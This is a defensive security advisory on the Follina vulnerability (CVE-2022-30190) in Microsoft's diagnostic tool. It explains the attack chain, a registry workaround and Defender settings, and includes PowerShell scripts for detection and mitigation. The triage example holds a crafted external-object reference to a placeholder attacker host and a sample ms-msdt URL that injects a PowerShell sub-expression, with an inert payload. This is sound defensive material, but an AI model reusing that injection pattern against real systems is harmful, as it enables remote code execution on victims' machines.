MSDT Follina vulnerability

What is Microsoft Vulnerability MSDT-Follina?

On May 30, 2022, a high-severity vulnerability (CVSS 3.1 base score 7.8) in the Microsoft Support Diagnostic Tool (MSDT) that can be triggered from Microsoft Office documents became publicly known. It is tracked as CVE-2022-30190 and is commonly referred to by the name "Follina". It is particularly concerning that the attack complexity is rated low: the vulnerability can be exploited by attackers with little skill and can cause considerable damage on the affected system.

General information about MSDT-Follina

The vulnerability lies in the Microsoft Support Diagnostic Tool (MSDT) [https://docs.microsoft.com/de-de/windows-server/administration/windows-commands/msdt], which is normally used to collect diagnostic data and send it to Microsoft. A crafted document causes Office to fetch content from the Internet that invokes MSDT through its ms-msdt: URL protocol handler; MSDT then runs attacker-supplied code with the rights of the user who opened the document. With those rights the attacker can install programs, read, change or delete data and create accounts. Whether this amounts to full control of the system depends on the privileges of that user and on whether further vulnerabilities allow privilege escalation.


Technical information on MSDT-Follina

The affected document contains a reference to an external https URL (an OLE object relationship with TargetMode="External"), which Office fetches when the document is opened. The HTML returned contains JavaScript that redirects to an ms-msdt: URL. This launches the diagnostic tool described above with the parameters from that URL; the IT_BrowseForFile parameter carries a PowerShell sub-expression of the form $( ... ), which MSDT evaluates, so the attacker's code is executed through PowerShell. What is particularly insidious is that no macros are involved, so the classic macro protection offers no help against this attack. Protected View does block the document variant as long as the user does not leave it via "Enable Editing", but an RTF variant of the document triggers the chain from the Windows Explorer preview pane without the file being opened at all.
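The chain described above, as an added triage example that is not part of the original advisory: a PowerShell script that lists the external OLE object targets in a .docx, pulls the ms-msdt: URL out of fetched HTML and extracts the PowerShell sub-expression carried in IT_BrowseForFile, and flags msdt.exe process-creation records that match the pattern. The sample relationship XML, the sample HTML (with an inert payload) and the sample process records are constructed for illustration, and the function names are this example's own.

```powershell
# Added example, not from the original advisory. All sample inputs are constructed.
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Stage 1: the document. A .docx is a ZIP; the external reference is an oleObject
# relationship with TargetMode="External" in word/_rels/document.xml.rels.
function Get-DocxRelsXml {
    param([Parameter(Mandatory)][string]$Path)
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        $entry = $zip.GetEntry('word/_rels/document.xml.rels')
        if ($null -eq $entry) { return $null }
        $reader = New-Object System.IO.StreamReader($entry.Open())
        try { $reader.ReadToEnd() } finally { $reader.Dispose() }
    } finally { $zip.Dispose() }
}
function Get-ExternalOleTarget {
    param([Parameter(Mandatory)][string]$RelsXml)
    [xml]$rels = $RelsXml
    @($rels.Relationships.Relationship) |
        Where-Object { $_.TargetMode -eq 'External' -and $_.Type -like '*/oleObject' } |
        ForEach-Object { $_.Target }
}

# Stage 2: the fetched HTML. Its script redirects to an ms-msdt: URL; the code MSDT
# ends up running is the $( ... ) sub-expression inside IT_BrowseForFile.
function Get-MsdtPayload {
    param([Parameter(Mandatory)][string]$Html)
    foreach ($m in [regex]::Matches($Html, 'ms-msdt:[^\r\n]+')) {
        $uri = $m.Value.TrimEnd('"', ';', '\')
        $start = $uri.IndexOf('$(')
        if ($start -lt 0) { continue }
        # Walk to the matching close parenthesis; real payloads nest several calls.
        $depth = 0; $end = -1
        for ($i = $start + 1; $i -lt $uri.Length -and $end -lt 0; $i++) {
            $c = $uri.Substring($i, 1)
            if ($c -eq '(') { $depth++ }
            elseif ($c -eq ')') { $depth--; if ($depth -eq 0) { $end = $i } }
        }
        if ($end -gt $start) {
            [pscustomobject]@{ Uri = $uri; PowerShell = $uri.Substring($start + 2, $end - $start - 2) }
        }
    }
}

# Stage 3: process-creation telemetry. msdt.exe started by an Office application,
# or with a sub-expression in IT_BrowseForFile, is the signal to alert on.
function Test-SuspiciousMsdt {
    param([Parameter(Mandatory)]$Record)   # needs ParentImage, Image, CommandLine
    if ($Record.Image -notmatch '\\msdt\.exe$') { return }
    $reasons = @()
    if ($Record.ParentImage -match '\\(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$') { $reasons += 'spawned by an Office application' }
    if ($Record.CommandLine -match 'IT_BrowseForFile=[^"]*\$\(') { $reasons += 'PowerShell sub-expression in IT_BrowseForFile' }
    if ($reasons.Count -gt 0) { [pscustomobject]@{ CommandLine = $Record.CommandLine; Reason = ($reasons -join '; ') } }
}

# --- constructed sample inputs (attacker.example is a placeholder host) ---
$sampleRels = @'
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://attacker.example/payload.html" TargetMode="External"/>
</Relationships>
'@
$sampleHtml = @'
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=h$(Write-Output 'follina-test')i/../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
'@
$sampleRecords = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       Image       = 'C:\Windows\System32\msdt.exe'
                       CommandLine = 'C:\Windows\System32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=h$(Write-Output follina-test)i/../../../Windows/System32/mpsigstub.exe"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\msdt.exe'
                       CommandLine = 'C:\Windows\System32\msdt.exe -id NetworkDiagnosticsWeb' }
)

Get-ExternalOleTarget -RelsXml $sampleRels                  # https://attacker.example/payload.html
Get-MsdtPayload -Html $sampleHtml                           # PowerShell: Write-Output 'follina-test'
$sampleRecords | ForEach-Object { Test-SuspiciousMsdt $_ }  # only the WINWORD-spawned record is flagged
# Against a real file: Get-ExternalOleTarget -RelsXml (Get-DocxRelsXml '.\suspect.docx')
```

The third stage is the one to wire into your SIEM: a legitimate troubleshooter launch (second record) has explorer.exe or a Settings process as parent and no IT_BrowseForFile sub-expression, so both conditions stay quiet on normal use.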

Workaround

The following workaround is recommended until the patch can be installed. (Microsoft has since shipped a fix for CVE-2022-30190 in the Windows security updates of June 14, 2022; the workaround remains useful for systems that cannot yet be updated.)

The ms-msdt URL protocol handler used in the attack should be deregistered, so that the links in the malicious documents can no longer be invoked and executed automatically.

1. Open a command prompt as administrator.

2. Create a backup of the registry key HKEY_CLASSES_ROOT\ms-msdt with the command:

   reg export HKEY_CLASSES_ROOT\ms-msdt filename

3. Delete the registry key with:

   reg delete HKEY_CLASSES_ROOT\ms-msdt /f

To undo the workaround, for example once the update is installed, import the saved key again with:

   reg import filename
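The three steps above as one script with rollback, added here as an example and not taken from the original advisory. It verifies each step through the registry provider rather than trusting the exit code alone; the backup location and the script name used in the usage note are assumptions.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original advisory: backup, delete and verify the
# ms-msdt protocol handler key; -Restore imports the backup again.
# The default backup path is an assumption.
param(
    [string]$BackupFile = "$env:ProgramData\ms-msdt-backup.reg",
    [switch]$Restore
)

$key    = 'HKEY_CLASSES_ROOT\ms-msdt'
$psPath = "Registry::$key"

function Test-MsdtHandlerRegistered {
    # $true while the ms-msdt: protocol handler is still registered.
    Test-Path -LiteralPath $psPath
}

if ($Restore) {
    # Rollback: re-import the exported key once the system is patched.
    if (-not (Test-Path -LiteralPath $BackupFile)) { throw "No backup at $BackupFile, nothing to restore." }
    reg.exe import $BackupFile 2>&1 | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-MsdtHandlerRegistered)) { throw 'Import failed, ms-msdt handler not restored.' }
    Write-Output "Restored $key from $BackupFile"
    return
}

if (-not (Test-MsdtHandlerRegistered)) {
    Write-Output "$key is already absent, nothing to do."
    return
}

# Step 2: export before deleting so the change can be reverted (/y overwrites an old backup).
reg.exe export $key $BackupFile /y 2>&1 | Out-Null
if ($LASTEXITCODE -ne 0 -or -not (Test-Path -LiteralPath $BackupFile)) { throw 'Backup failed, refusing to delete the key.' }

# Step 3: deregister the protocol handler; /f suppresses the confirmation prompt.
reg.exe delete $key /f 2>&1 | Out-Null
if ($LASTEXITCODE -ne 0 -or (Test-MsdtHandlerRegistered)) { throw 'reg delete did not remove the key.' }
Write-Output "Removed $key (backup: $BackupFile)"
```

Saved as, say, Remove-MsdtHandler.ps1, it is run once from an elevated session to apply the workaround and again with -Restore to revert it. Because it checks for the key before doing anything, it can be deployed repeatedly through a management tool without failing on hosts that have already been handled.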

No negative effects on productivity are known to date (the Windows troubleshooters can still be reached through the Get Help application and the Settings app), but the change should still be tested in your own environment before a wide rollout.

Details are given in Microsoft's guidance for CVE-2022-30190 on the Microsoft Security Response Center blog.

Alternative solutions

Furthermore, Microsoft recommends that users of Microsoft Defender for Endpoint enable the attack surface reduction rule "Block all Office applications from creating child processes" (rule ID D4F940AB-401B-4EFC-AADC-AD5F3C50688A, referred to in Microsoft's guidance as BlockOfficeCreateProcessRule), which prevents Office applications from starting child processes such as msdt.exe. Where Office add-ins legitimately start child processes, run the rule in audit mode first and review the events before switching it to block.

In addition, Microsoft Defender Antivirus detects exploitation attempts with security intelligence (signature) update 1.367.719.0 or later, and Microsoft Defender for Endpoint raises alerts for suspicious behaviour by an Office application and by msdt.exe.
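Enabling the rule and checking both Defender mitigations, together with the registry workaround, from an elevated PowerShell session. This is an added example, not code from the original advisory; the rule GUID is Microsoft's published ID for "Block all Office applications from creating child processes", and the cmdlets are those shipped with Microsoft Defender Antivirus. The function name is this example's own.

```powershell
# Added example, not from the original advisory. Run elevated on a host with
# Microsoft Defender Antivirus as the active antivirus.
$ruleId       = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'   # Block all Office applications from creating child processes
$minSignature = [version]'1.367.719.0'                   # first security intelligence build with Follina detections

# Enabled = block. Use AuditMode first where Office add-ins legitimately spawn
# child processes, review the ASR events, then switch to Enabled.
Add-MpPreference -AttackSurfaceReductionRules_Ids $ruleId -AttackSurfaceReductionRules_Actions Enabled

function Get-FollinaMitigationState {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    # Ids and Actions are parallel arrays; find the index of our rule.
    $ids    = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { "$_".ToUpper() })
    $idx    = [array]::IndexOf($ids, $ruleId)
    $action = if ($idx -ge 0) { [int]$pref.AttackSurfaceReductionRules_Actions[$idx] } else { -1 }
    $ruleState = switch ($action) { 1 { 'Block' } 2 { 'Audit' } 6 { 'Warn' } default { 'Not configured' } }
    [pscustomobject]@{
        OfficeChildProcessRule = $ruleState
        SignatureVersion       = $status.AntivirusSignatureVersion
        SignatureCoversFollina = ([version]$status.AntivirusSignatureVersion -ge $minSignature)
        MsdtHandlerRemoved     = -not (Test-Path -LiteralPath 'Registry::HKEY_CLASSES_ROOT\ms-msdt')
    }
}

Get-FollinaMitigationState
```

The output object is what a compliance check would collect per host: the rule should report Block, SignatureCoversFollina should be true, and on unpatched hosts MsdtHandlerRemoved should be true as well.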

Further steps

In addition, all employees should be informed and made aware that they need to be particularly vigilant when receiving Office files: the sender should be verified and the content of the file should be expected and known. Where channels for raising awareness and informing employees already exist, this information should be distributed through them.

As soon as further information is available from Microsoft, in particular on patches or updates, we will inform you accordingly or publish it on this website. The vulnerability has only recently become known, so further attack scenarios may develop and further measures may become necessary. Those affected should therefore follow further developments. In the event of changes, we will inform you on our website and continuously update the information in this advisory.
